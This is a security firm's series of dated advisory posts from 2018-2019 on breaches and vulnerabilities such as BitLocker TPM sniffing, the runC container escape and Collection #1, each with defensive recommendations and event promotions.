Join us for a primer on Red Team Penetration Testing.  InGuardians Offensive Services Team will discuss what is a red team pentest, what clients should be considering when preparing one, and what to expect to learn from the results.

Register here:

For all upcoming webinars, please visit:

Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019

SANS Security West | San Diego | May 9 – May 13 2019
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit:

3/26/19 Bitlocker Keys Recoverable, Allowing Bad Actors to Unlock Encrypted Disks
Earlier in March, researchers from PulseSecurity released their analysis and research in recovering Bitlocker Full Disk Encryption (FDE) Master Keys from an associated v1.2 or v2.0 Trusted Platform Module (TPM) by sniffing the key exchange on the bus with inexpensive hardware.  The recovered Master Key was then used to decrypt the drive, recovering all of the data.


Given tools, time and knowledge of this technique, an attacker with physical access can decrypt a Bitlocker full disk-encrypted computer.

Many organizations rely on Microsoft Bitlocker as a solution for built-in, low cost, easily managed FDE, leveraging the previous investments in Microsoft products.  While InGuardians recommends FDE as a matter of course, these new attacks against default installations of Bitlocker have raised questions about its overall effectiveness.

While this attack is particularly obtuse in its implementation, requiring some special skills, hardware and analytic techniques, all are well within capability for even a moderately determined attacker. This is compounded by the readily available inexpensive hardware and open source tools.  Some points to note on this attack; the device must be in possession of the attacker in order to obtain the communication on the bus between the TPM and the drive; also, unlike the “evil maid” attacks, this attack does require significant time and setup to perform.

Ultimately, should an organization lose a device encrypted with Bitlocker with the default configuration they should no longer consider the data contained therein secure, and should consider the application of the appropriate breach notification requirements for their jurisdiction.

This specific attack is aimed at Bitlocker, but demonstrates that key exchange and key storage are critical elements of any security implementation. Every FDE system needs to be implemented properly. Like any technology involving cryptography, that implementation can be difficult.

In its default state, Bitlocker can be compromised through this attack. However, with the adoption of additional controls within the boot process and Bitlocker configuration, this attack can be effectively mitigated. These additional configuration can take the form of pairing the TPM with a pre-boot pin to be entered by the user at time of boot, or the TPM in combination with a properly configured Smart Card.  In these two cases, two factor authentication (2FA) has been added to the boot process, adding additional unknown/unrecoverable data to the Bitlocker encryption/decryption process. In mitigating this specific attack, it does require user intervention at time of boot, potentially perceived as a hindrance to forkflow.

Additional Resources


Microsoft – Bitlocker Coutermeasures

InGuardians Events & Resources

Upcoming Webinars:


Thursday, March 28 at 12 PM EDT /3 PM EDT
Understand how to attack and defend Kubernetes and other container orchestration platforms.
Register here:


“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security

April 18 12 PM PDT / 3 PM EDT
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.

Register here:

For all upcoming webinars, please visit:


Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019

Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit:

3/13/19 Citrix Breached: Over Six Terabytes of Data Stolen, Impact to Clients Unknown
On March 8th, Citrix announced that it had been hacked and that over six (6) terabytes of sensitive data had been stolen. This attack is currently being attributed to the Iranian-backed Iridium group. The files were exfiltrated from the network after the malicious actors bypassed multi-factor authentication systems and connected to Citrix VPNs. The bad actors stole e-mail correspondence, files left on network shares, and data pertaining to project management and procurement. The FBI believes that the attackers gained access to Citrix networks by brute forcing a weak password on the external network and currently has no idea how long the attackers were on the network before they were detected.

While the breach’s impact is currently being evaluated,  Citrix clients should be monitored closely to ensure that client accounts and credentials were not stolen along with internal documents.

Given the sheer volume of data stolen in the breach, InGuardians recommends changing all passwords for accounts related to Citrix. InGuardians also recommends that organizations take a strong look at their password policies and ensure that strong passwords are being utilized in your organization to help prevent password spraying of common passwords allowing attackers to gain access to your network. Multi-factor authentication is also critical, but does not make strong password policies irrelevant.
If  you suspect that your organization has been affected by the breach, begin incident response triage and initiate a threat hunting operation.

Additional Resources
Iranian-backed hackers ransacked Citrix, swiped 6TB+ of emails, docs, secrets, claims cyber-biz (The Register)

“Citrix investigating unauthorized access to the internal network” (Citrix Blog: Stan Black)

“Iranian-backed hackers stole data from major U.S. government contractor” (NBC News)

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM EDT /3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.

“Scanners, Tunnels, and Sims, Oh My!”
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here:

For all upcoming training and events, please visit:

For all upcoming webinars, please visit:

3/7/19 Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
Dow Jones’ watchlist of politicians, high-risk individuals and corporate entities has been exposed after a company with access to the database left it on a server without a password.
This watchlist includes senior political figures (“politically exposed persons,”) their relatives, close associates and companies to which they are linked. It also includes individuals and organizations who have been involved in financial crimes and individuals on terrorist watchlists.It includes not only names, but also Dow Jones’ internal profile notes and PII including date of birth, place of citizenship and photographs. This watchlist, while leaked in file format here, is sold as a product accessible via APIs.

It is important to note that Dow Jones was not hacked in this instance.  A client of theirs, with legitimate access to the data, failed to secure its access to the information. That “weakest link” exposed a large database of sensitive information and negated the security efforts of Dow Jones and every other client paying for access who properly secured their access to the watchlist.

The overall impact of this breach is unknown at this time, but if this information is used to target high profile persons of interest it may lead to upstream liability for all companies involved. First off, this should trigger an examination of data sharing agreements at Dow Jones and subsequently serve as a lesson for the rest of us.  Next, we need to ask what other data on that server was compromised? What other servers of the Dow Jones client were compromised and what other information was lost? What is that company’s current security posture and in what ways has that been assessed or verified?

The next step is to immediately look at your own companies’ data sharing or subscribing agreements. With what other organizations do you share data? What technical network, software, and procedural safeguards are in place? What contractual language is in place among business entities requiring information security practices? What assurances or auditing mechanisms are in place, both contractually AND in practice? When was the last time such systems were checked? WHO has the report? How is that report guarded?

First, answer the questions above, and more that will come to mind in your own organization. If you are not the ‘go to’ person for any of those questions, get the question to the right place.

We recommend that organizations explicitly review contracts and consider legal issues, in addition to requiring a third-party security assessment and vendor security questionnaire, before data sharing agreements go into effect.

Your business should have a data classification process – what matters most, some, and least? Know what data is sensitive, how sensitive it is, and where that data is stored and shared. Do those access points have logs? In recent engagements, InGuardians has continued to find organizations that are not prepared to detect or log unauthorized access to sensitive systems and data. Review what you log, where logs are stored, log retention policy, and how they are analyzed. A log that is overwritten in 48 hours is unlikely to provide useful info in the event of unauthorized access or to track a compromise and breach.

Additional Resources
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked (TechCrunch) 

Politically Exposed Person (Wikipedia)

Dow Jones Risk Screening Watchlist Exposed (Security Discovery blog)

Cloud Leak: WSJ Parent Company Dow Jones Exposed Customer Data (UpGuard Blog)

A massive financial crime and terrorism database has leaked (ZDNet, 2016) 

InGuardians Events & Resources
LIVE WEBINAR Thursday, March 28 at 12 PM EDT /3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Register here:

Justin Searle, InGuardians Director of ICS Security will be at SANS ICS Summit in Orlando, Florida.
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools with Justin Searle, our Director of ICS Security at SANS ICS Summit | Mar 18-25 | Orlando, FL.

LIVE WEBINAR on April 18 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Dir of ICS Security
Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here:

For all upcoming training and events, please visit:

For all upcoming webinars, please visit:

2/21/19 Container Escape in runC-based technology including Docker and Kubernetes
Security researchers have discovered a container escape method for many known runC-based containerization technologies, including Docker, Kubernetes, cri-o, and containerd.  Additionally, a slight variant of the exploit code is reported to work on LXC and Apache Mesos.  Amazon Web Services (AWS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Container Service for Kubernetes (Amazon EKS), and AWS Fargate, Google Kubernetes Engine (GKE), Digital Ocean, OpenShift, and other container providers were also affected and are in various states of patching.

In the case of this exploit, an attacker is able to escape from a container and gain full root access to the host. The attacker will then likely access other resources via network, storage and data stored on the host. Given this level of access, the attacker could rewrite any host-based firewall rules as necessary.

Multiple proof of concept (PoC) exploits exist for this vulnerability. One exploit relies on a malicious container deployed in the container infrastructure.  This malicious container can then be used to overwrite the host runC binary with minimal user interaction, ultimately granting root level access to the host operating system. While it may seem that the barrier to entry is the deployment of the malicious container, this is often easily overcome; many administrators fail to properly set permissions for users, allowing them to deploy their own containers at will, or, the administrators are often willing to use the “first available” public container that may already be poisoned by an attacker.

Another exploit can be used in an already-running container, likely by an attacker who compromises the container’s application or is able to start a fresh privileged container on the cluster. It appears that this requires that an administrator or infrastructure component “exec” a command in that container after the exploit has run. In any case, this vulnerability will be exploited.

Failure to resolve runC vulnerabilities can allow a malicious party to gain root level access to the underlying container host. This root level access grants full permissions to the host operating system, as well as the ability to interact with all of the containers running on the host. To compound the issue, once an attacker has root access to the one host, it can be used as a pivot point into the internal network, with the capability to compromise additional resources.

InGuardians recommendations have several components, depending on the platform in which has been adopted:
All Platforms
◦    Examine runC-created container logs for anomalous activity
◦    Compare the running list of containers to your inventory
Internal cluster
◦    Update runC to the latest version for your supported platform.  See the Additional Resources section for details.
Hosted provider
◦    Amazon:  Amazon has currently provided patches for Amazon Linux, ECS, EKS, and Fargate, many of which need administrator intervention to apply. See the Additional Resources section for details. [4]
◦    Google: Default GKE nodes running Container-Optimized OS have been patched, but Ubuntu nodes must be patched by the user. See the Additional Resources section for details. [3]
◦    Digital Ocean: In an email to Digital Ocean customers, they have informed subscribers that they have patched runC.
◦    OpenShift and others: Contact your provider or review their vulnerability tracking information for the status of patches.
•    Other projects (Apache Mesos, LXC, etc)
◦    Contact the project for status of the patches, as no public information has been posted at the time of this writing.
Overall recommendations
◦    Develop or amend a robust patching strategy to specifically address containerization infrastructure.
◦    Implement the Principle of Least Privilege for your container service of choice, preventing deployment of new containers except by select users that have business need to do so.
◦    Deploy additional configuration, depending on platform, preventing runC from being executed at root (UID 0), using a lower privilege user. [2]
◦    Develop and deploy a robust AppArmor or SELinux profile to detect and prevent runC overwrites
◦    Use Pod Security Policies to enforce best practices, including requirements for unprivileged containers and AppArmor/SELinux/Seccomp profiles
◦    Upon deployment of new containers, provide a vetting mechanism for the selected public containers to ensure they do not contain additional, unwanted exploit code.  Alternatively, do not rely on public container images, and create them in house with known good code and applications.

Additional Resources
[1] CVE-2019-5736: runc container breakout (all versions)    

[2] Kubernetes Blog: Runc and CVE-2019-5736
[3] Google Cloud runC Security Bulletin
[4] AWS runC Security Bulletin
[5] ZDnet: Doomsday Docker security hole uncovered
[6] Nick Frichette’s Proof of Concept Exploit for CVE-2019-5736
[7] Exploit-DB Exploit 46369 for CVE-2019-5736

InGuardians Events & Resources
LIVE WEBINAR Thursday Feb 21 12PM PST | 3PM EST
Our Senior Security Consultant Adam Crompton @3nc0d3r is dropping a new set of tools for #RedTeam operations. Demo-heavy webinar… you don’t  want to miss! 

Register here:

For all of our upcoming webinars, please visit:

Adam will join our CTO Jay Beale on the RSA stage for “Hacking and Hardening Kubernetes”. This talk will demonstrate attacks on Kubernetes clusters, then demonstrate the  defenses that defeat those attacks.

More about this talk:

1/31/19 Managing security, risk, and insecurity
There have been several massive database breaches, application vulnerabilities, and many new exploits, and it’s only a month into the new year. Some of them are technical exploits and some have been procedural, like storing aggregate identity or authentication information.

System security is not the primary job for most organizations, but an aspect of providing some other goods or services. The core or primary business functions need to be supported by your data systems – they need to work. They should also be efficiently controlled and, of course, that’s why there are applications & programs in place to enable effective management. However, no one can know the inner workings of all of your applications. What can a manager do to reduce risk and exposure? Here is a short list to help manage insecurity.


  • Inventory all of the operating systems and applications on the network.
    • If there are separate segments or networks, know which apps are where, especially on any external or internet facing networks.
    • Include which version or build numbers are installed, along with the latest patch number.
    • IT/Security should provide regular updates and know when new exploits impact installed apps.
  • Review and enforce identity/credential management policies.
    • Require multi-factor authentication.
    • Require aperiodic changes – not all at once, and not always on first of the month.
    • Use password management software.
  • Test vulnerability and patch management process
    • Know what public vulnerabilities and patches exist for each of your OSs & Apps.
    • Know what the patch testing and deployment process are.
    • Know how to determine which patches are critical.
  • Inventory and classify data
    • Identify sensitive and compartmentalized information
    • Require specific handling procedures with each level of information classification.
    • Clearly, label data with its information classification
    • Securely store and compartmentalize sensitive and/or confidential information
  • Conduct system logging and log analysis.
    • Log critical and important events on sensitive systems and networks.
    • Sign and store logs for analysis and retention.
    • Histogram outgoing traffic – categorize known destinations, flag outliers.
    • Conduct log review and analysis of critical and important systems in order to identify areas of improvement in performance, availability, and security.
  • Maintain and analyze network and application controls
    • Tune firewalls/IPS/IDS to deter and detect exfiltration
    • Apply targeted rule sets tailored to the security level of each network segments
    • Analyze the security logs looking for performance hits, operational, business, and security-related events.


Remember, because we do not and cannot know what the next exploit is in advance, we are really managing levels of insecurity. As I was writing this, two new issues popped up: Apple’s FaceTime can eavesdrop before you actually connect, and Google is apparently systematically broadcasting sensitive browsing and personal information to third party advertisers. One could be listening in on a board meeting, the other could be revealing someone’s searches for particular grades of aluminum or certain electronic chips. Both could be sources of business intelligence.

A senior manager should be able to ask to see the results of a log review and not have to wait for it to happen – someone should have one for that week or day and be able to give a SHORT precis.  Simply asking the question, and then watching averted eyes and feet shuffling, may tell you all you need to know.

Take that response and shape behaviors, not by barking, but by clearly laying out what’s needed to keep up with events.

Additional Resources

“Apple to fix FaceTime bug that allows eavesdropping” – Washington Post

Google and IAB ad category lists show ‘massive leakage of highly intimate data,’ GDPR complaint claims

Data management giant Rubrik leaked a massive database of client data

InGuardians Events & Resources

Our next webinar “All of Your Copy/Paste Belongs to US” goes live in February. Stay tuned for dates and registration links  by visiting or following @InGuardians on Twitter

Black Hat USA 2019 registration is open!

Register here:—attacking-and-defending-linux-docker-and-kubernetes-14309

Justin Searle, our Director of ICS Security is teaching ” ASSESSING AND EXPLOITING CONTROL SYSTEMS & IIOT”

Register here:–iiot-14015

1/23/19 Over 1TB of Stolen Account Usernames and Passwords Made Available Publicly Last Week
A collection of over one terabyte of user data with names and passwords has been released. The passwords are allegedly from more than 2,000 compromised sites, though some or many of the site compromises may have occurred more than a year ago. As such, the collected passwords may not be current for the sites from which they were stolen. Given many people’s re-use of passwords, however, those passwords may be useful on entirely different sites.

Said to be a portion of a larger collection, this collection (also referred to as a “data dump”) has been referred to as “Collection #1”. “Collection #1” is comprised of over 2.7 billion records and 773 million unique email addresses. Unfortunately, this represents only a small portion of the full collection currently being distributed on many DarkWeb and Hacking Forums. The full collection, which is made up of “Collection #1-5 and Latest Anti-Public & Zabagur #1,” is a cloud-stored repository that contains over 1TB of data and is being sold on hacker forums.

The real problem and question is, “where did this dump come from and which companies were affected and are unaware?” Troy Hunt, the primary security researcher behind HaveIBeenPwnd and the Pwned Password checking sites, released a post documenting his analysis and ingestion of the email addresses and passwords he obtained from “Collection #1.” Mr. Hunt has come up with a plan for notifying users that use his service or vendors such as 1Password’s Watchtower, which has an integrated compromised-site checking feature, to check against the lists at to alert users of compromised accounts and credentials.

Mr. Hunt stated that this ingestion represented 140 million new email addresses that haveibeenpwned had not yet seen and therefore were not part of other publicly-released data breaches. These credentials are typically used by attackers to obtain access to services or applications. Attackers use the credentials from this type of data breach, testing them against many different websites, gaining access on a portion of those sites. This type of attack is commonly called “credential stuffing”, and presents a risk that many users do not often consider.

If your users are still using any of the passwords contained in this collection, attackers may use those same passwords, gaining access to both company and personal resources, such as e-mail, banking, document storage, and remote access.  The greatest impact stems from the difficulty that people have in managing large numbers of unique passwords. Many will use the same or similar passwords on multiple sites/services. Attackers will use variations of these passwords, including, but not limited to, incrementing numbers, years, or mixing in character/digit replacements.


  • Ensure all employees use multi-factor authentication for all company resources.
  • Check if both company and personal email addresses are within the public breach information, including but not limited to,
  • Use a mass password changing service to generate unique passwords and change all your current passwords to newer, stronger and differing passwords.
  • Never use the same password on multiple sites.
  • Never use common or easily guessable patterns for passwords: (season-year, incrementing, etc)
  • Enable two factor authentication, such as TOTP or third party services, like those available from DUO, for all services that support it and contain any sensitive or personal information.
  • Sign up for monitoring services that watch for this type of information or use a tool such as WatchTower integrated into 1Password’s password manager to watch for compromised accounts.

Additional Resources
“The 773 Million Record “Collection #1” Data Breach” (Troy Hunt’s blog)

Post: Collection 1 through 5, Anti-Public, Zabagur #1  Post (Raidforums)

“HaveIBeenPwned” Compromised Account Search Service

“Pwned Passwords” Compromised Password Search Service

“Credential Stuffing” (Wikipedia)

“Credential Stuffing” (OWASP)

InGuardians Events & Resources

Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum.  You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

For future webinars, please visit:


InGuardians friends in Florida!  David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class:

Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.

  • Over 30 hands-on labs
  • Comprehensive coverage of tools
  • Real world tips from the experts
  • CTF Challenge 

SEC560 is a must for every security professional!


Reserve your spot now!

Dive deep into SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques with hands-on training from Justin Searle, our Director of ICS Security at SANS Secure Japan Mon, February 25 – Sat, March 2, 2019

For more events and future training schedule, please visit

1/14/19 Microsoft patches multiple remote code execution vulnerabilities
On January 8th, 2019 Microsoft released a patch for Windows that includes fixes for multiple instances of Remote Code Execution (RCE). One instance of Remote Code Execution affected DHCP. To exploit this vulnerability an attacker must craft and send a special DHCP request, which would allow them to execute to arbitrary code in the SYSTEM context. The Jet Database also has multiple issues with RCE. Specifically, it improperly handles memory in a way that permits execution of arbitrary code under the SYSTEM context. There were also a couple of instances of RCE inside of Hyper-V which allow a malicious application running on the guest OS to access the host OS. Finally, there is an RCE vulnerability in Exchange which, if triggered by a malicious email, can then permit arbitrary code execution in the SYSTEM context.

With multiple instances of Remote Code Execution in the first patch of 2019 but no “publicly” available proof of concepts at this time, InGuardians currently rates the impact as Medium. While exploits are not publicly available yet, it remains unknown if malicious actors have access to exploits and are actively using them.  Should such exploits become publicly available, the impact of this issue could easily move rapidly into the Critical range, particularly given the size of Microsoft Exchange’s enterprise user base.

Given the severity of these security patches, InGuardians recommends that you evaluate and push these patches to production environments posthaste.  In addition, apply any relevant IPS and IDS signatures, and monitor for triggering.

Additional Resources
“CVE-2019-0579 Details” (Mitre)

“CVE-2019-0547 Details” (Mitre)

“CVE-2019-0550 Details” (Microsoft)

“CVE-2019-0551 Details” (Microsoft)

“CVE-2019-0586 Details” (Microsoft)

InGuardians Events & Resources
Great news! InGuardians will be hosting monthly webinars, and you get the first invite!

This month, Larry Pesce, our Director of Research, will lead a discussion about Software Defined Radio platforms. In this webinar, you’ll examine a few interesting software packages (with demos) to begin your exploration of the RF spectrum.  You’ll also discuss what the advent of SDR can do to change the landscape for C&C, data exfiltration and information gathering.

Please join us on Thursday, January 31st, at 12PM Pacific.

For future webinars, please visit:

InGuardians friends in Florida!  David Mayer, our Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class:
Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019.
• Over 30 hands-on labs
    •Comprehensive coverage of tools
     •Real-world tips from the experts
     •CTF Challenge 

SEC560 is a must for every security professional!

Reserve your spot now!

For more events and future training schedule, please visit

1/2/19 Failures in Delivery: CenturyLink, Tribune Publishing and the L.A. Times’ End of Year Problems
Two different events at the end of December 2018, reveal previously unrecognized gaps in business continuity planning. CenturyLink, a major telecom provider also responsible for  managing critical 911 systems, experienced a nationwide outage. In addition to the heavy impact on emergency services, the disruption to their core business caused many consumers to cancel, reschedule, or conduct business and personal calls with out-of-band solutions, such as Signal and Slack.

A few days later, Tribune Publishing fell victim to a targeted malware attack that prevented or delayed publishing of several large newspapers across the United States.  Tribune is the the publisher of several large newspapers, including the Baltimore Sun, The Chicago Tribune, and the West Coast distribution of the Wall Street Journal and NY Times, all tied with the Olympic printing plant in downtown Los Angeles.

Two different information technology issues in two different companies threatened the business continuity of many companies nationwide.

First, a single telecom provider’s disruption rippled across business and public services, preventing operations, including that of some vital 911 emergency phone services. The outage continued for more than two days and, according to a document recovered by reporter Brian Krebs, was caused by a single bad network or network management card.  FCC Chairman Ajit Pai acknowledged that the 911 service disruption will be subject to federal inquiry, saying, “I’ve directed the Public Safety and Homeland Security Bureau to immediately launch an investigation into the cause and impact of this outage.”

Second, a malware attack targeted newspapers in widely separated markets. Investigations are ongoing. The LA Times reports that the malware responsible was a variant of “Ryuk”.  This malware was highlighted specifically by the Department of Health and Human Services’ cybersecurity task force in an August advisory. However, the LA Times, also a victim, is no longer a Tribune company. It raises questions about both monoculture vulnerability and network connectivity. Challenges of merging networks from acquired companies, and among a parent firm with multiple separate entities, can leave many security gaps. Domain and Forest trusts can leave paths open for malware to spread well beyond the initial point of compromise.

Because modern business is often so heavily interconnected, the systems that they rely on are also increasingly interconnected. Too often these layers and branches merge together and grow out of expedience, with limited review of the security risk presented. InGuardians recommends that organizations identify all layers in their business continuity plans. It is no longer enough to simply know who your providers are, you should also know who theirs are. Review previous Merger & Acquisition network information for single points of failure. Look for secondary or backup network connections and verify that they are, in fact, separate. Review network permissions with both parent and partner organizations. Confirm which firewalls are in place and determine if the rule sets are up to date and able to prevent the spread of malware from a “trusted” connection. It is also important to remember that, when it comes to business continuity planning, especially for critical systems, sometimes legacy systems and processes are themselves a good fallback plan. In one case in Boston, people were unable to call 911 to report a fire. Instead of calling 911, they used a fire ‘call box’ to get firefighters on scene. Boston Fire remarked that the ‘call box’ system has been successfully operating since 1852. InGuardians reminds you to review your business continuity plans early in 2019, keeping in mind that not all business continuity failures are caused by software problems.

Additional Resources
“Communications outage disrupts 911 service in parts of the country” (CNN) 

“FCC launches probe of CenturyLink in wake of nationwide 911 outage” (NBC News) 

Brian Krebs’ disclosure of CenturyLink’s “Event Conclusion Summary” (Twitter)

“Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.“  (LA Times) 

“Ransomware suspected in cyberattack that crippled major US newspapers“ (ZDNet) 

“Identifying, understanding, and analyzing critical infrastructure interdependencies” (IEEE Control Systems, 2002)

InGuardians Events & Resources
David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

Enjoyed KringleCon? We did too! If you haven’t had the chance to check out InGuardians talks, you can do so here:
Mike Poor on PCAPs for fun and profit:

Larry Pesce on SDR:

Jay Beale on Kubernetes:

For more events and future training schedule, please visit

12/18/2018 Critical Windows DNS Server Heap Overflow Vulnerability
Microsoft has released patches for a remote code execution vulnerability (RCE), though a heap overflow condition described by CVE-2018-8540. Unfortunately, this critical issue has not been the subject of much discussion and has largely flown under the radar. Due to the critical nature of DNS in enterprise networks in order to maintain proper function of Active Directory environments and access to critical internal and Internet based resources, this issue should be addressed immediately.  Additionally, the requirement for Microsoft DNS services to be implemented on a Domain Controller, make this issue even more critical to address, due to the sensitive contents of Active Directory.

While there is no publicly available exploit code available at the time of this writing, it is strictly a matter of time before there is. Given the nature of this attack, in that only a specifically crafted DNS request needs to be sent to an vulnerable server, it is expected that the window for Proof-of-Concept code availability to be short. Should exploit code become available in the near future, it’s impact could be disastrous in an unpatched environment.

If an attacker were to gain control of Windows DNS servers servicing a corporate network the problems are several fold. A successful attacker could:

•    modify DNS records in the domain to redirect authentication attempts against a rogue Domain Controller, in order to harvest credentials;

•    modify DNS records in an erroneous fashion to perform denial of service attacks, affecting Active Directory or other application for complete and total communications failures;

•    use the compromised DNS server as a highly privileged pivot point, with a high degree of success in complete compromise of the entire Active Directory infrastructure.

Due to the possible impact of a DNS server compromise it is critical for organizations to get ahead of public exploit code release. InGuardians recommends that organizations apply the appropriate patches as recommended by Microsoft immediately.

Additionally, with the criticality and impact of this specific exploit condition, it is a good time for organizations to review and revise their overall patching strategy and timelines.  Many organizations take a hybridized rolling approach to applying patches to critical systems in order to minimize downtime.  In these cases, critical components of the infrastructure may be left unpatched for extended periods, often 3 months or more.  Instead of relying purely on metrics, we recommend including human intelligence in this process in order to adjust patching timelines based on real-world impact.

Additional Resources
Microsoft CVE-2018-8626 security Guidance:

December patch Tuesday narrative:

ZDI December patch Tuesday narrative:

InGuardians Events & Resources
InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18

For more events and future training schedule, please visit

12/12/2018 Data Security for International Travel
While traveling to the UK recently, the CEO of a small US company involved in legal action against Facebook was allegedly compelled to divulge information to the British Parliament, in violation of a US court order. [1]  The information had been obtained during the US case’s discovery phase. This started a discussion on the circumstances surrounding it. Could a Member of Parliament really order someone to turn over documents without going through the US courts? Why would the CEO take that information with him? What could he have done to protect the information?

While the truth of the story turned out to be different [2], the questions are still valid, especially when it comes to who can compel disclosure of data. Sometimes, rare and arcane options exist that even experienced legal minds don’t know about or fully understand. By the nature of their position, CEOs and other executives necessarily have access to sensitive information about strategic, operational, planning, and legal matters. This information is often carried with them on, or accessible through, their notebook computers and other electronic devices. Travel to foreign nations thus opens that information to new risks.

Even traveling to a “friendly” foreign nation involves entering into a new legal regime that may be entirely unfamiliar, with an entirely different set of rights and consequences. Countries that are geopolitically friendly might still have minor differences with one another. One country might attempt to seize evidence to gain an advantage in negotiations. It’s not just formal procedures to worry about: Evil Maid Attacks, where someone gains access to a hotel room to surreptitiously access electronic devices, truly occur with varying degrees of sophistication.[3]

Modern technologies provide enormous mobility benefits. Notebooks, tablets, and phones are smaller; storage technologies like solid state drives (SSDs) are light and fast; and virtual private networks (VPNs) allow connectivity to corporate networks from around the world. But these technologies can also add risk: the devices are integrated into our lives so we’re loathe to leave them behind; SSDs work differently than traditional hard drives, making full erasure impossible to verify; finally, some nations have strict laws around VPNs ranging from registered use to outright bans. The desire to keep the familiar when in an unfamiliar place can drastically increase the risk involved.

Seizure of devices can result in effects ranging from data availability to data theft via forensic data recovery to addition of malicious code. While loss of control of sensitive data can be extremely serious, bringing back malicious code–especially code developed and installed by a nation-state–can be catastrophic not just to your company but to your partners, vendors, and customers. Foreign intelligence agencies often attempt to penetrate government systems through contractors. This kind of malware is often extremely difficult to identify and may exist for years before detection, with potentially enormous cleanup costs and possible loss of current and future business.

The number of factors going into modern travel concerns has become dizzying. Aside from general concerns for ensuring the security of data at rest and in motion, political and international factors may weigh in and change on a moment’s notice. Technical considerations for evolving computing environments also play a significant role. All of what follows is subject to company-specific risk analysis. Many variables factor into this: presence of one’s company in the destination country, who the traveler is meeting, recent domestic and international incidents, and even the traveler’s social media posts and interactions. The recommendations are therefore based on travel to high-risk countries and may not be as necessary for a trip to lower-risk nations. When traveling to a foreign country, InGuardians recommends leaving your normal devices at home. Bring devices used only for travel purposes, minimizing the number of devices to ideally just a notebook and phone. Be aware of laws of and relationships between starting, layover, and destination countries. If you’re under suspicion, the intermediate airport(s) can search you and your belongings in most cases. Bear in mind that countries can change course incredibly quickly. When crises happen such as terrorist attacks, international conflict, or political turmoil, many countries can become much more aggressive in their scrutiny. Notebooks should be configured to have the absolute minimum required software, be fully patched (including any firmware, drivers, and third-party programs), use whole-disk encryption, and probably have additional lock-downs that may not be used in normal deployments. Users should not be able to install software and the notebook should not be attached to an Active Directory domain. All email and web activities should be performed through a combination of a very strong VPN with multi-factor authentication and either web or RDP access, only to data expressly needed for the trip; no email client (including Outlook) should be installed locally to avoid the temptation to set it up. Users should know how to verify a proper VPN connection, including validating certificates; don’t underestimate the value of paper in providing the necessary validation information. Users should connect to only trusted networks, which in many cases will consist of only their phone’s WiFi (watch out for data costs–streaming Netflix is probably a bad idea). For the phone, get a recent model that actively gets manufacturer/carrier updates and a new number for international travel. Additional consideration should be given for phone models that store password information in hardware security modules (HSMs) for resistance to password recovery attacks. Encrypt the phone and require a long password, disallowing numeric PINs. Put no personal data on it: it’s just for Internet and phone calls. Require that IT create a new iTunes or Google identity for which the traveler will not have the password to prevent installation of apps. Scrap the account after travel. Corporate email should be accessed through the phone’s browser, ideally over the same VPN the notebook uses. This means manually checking and not relying on notifications. No device should ever leave your side: take them to meetings, meals, and wherever else you go, and do not let them out of your sight (another reason for minimizing the number of devices). Consider any seized or missing device to be compromised and avoid using it at all. In a worst-case scenario, you should be ready to destroy not just a drive but an entire notebook and all other devices if there is reasonable suspicion of compromise. At a minimum, if you’re planning to replace instead of destroy a device, the motherboard firmware should be re-flashed and reset using a variant obtained and cryptographically checked before the trip occurs. You also must be willing to walk away from the hardware and possibly accept refusal of entry to the country (which can itself have cascading effects for future entry to that and other nations).

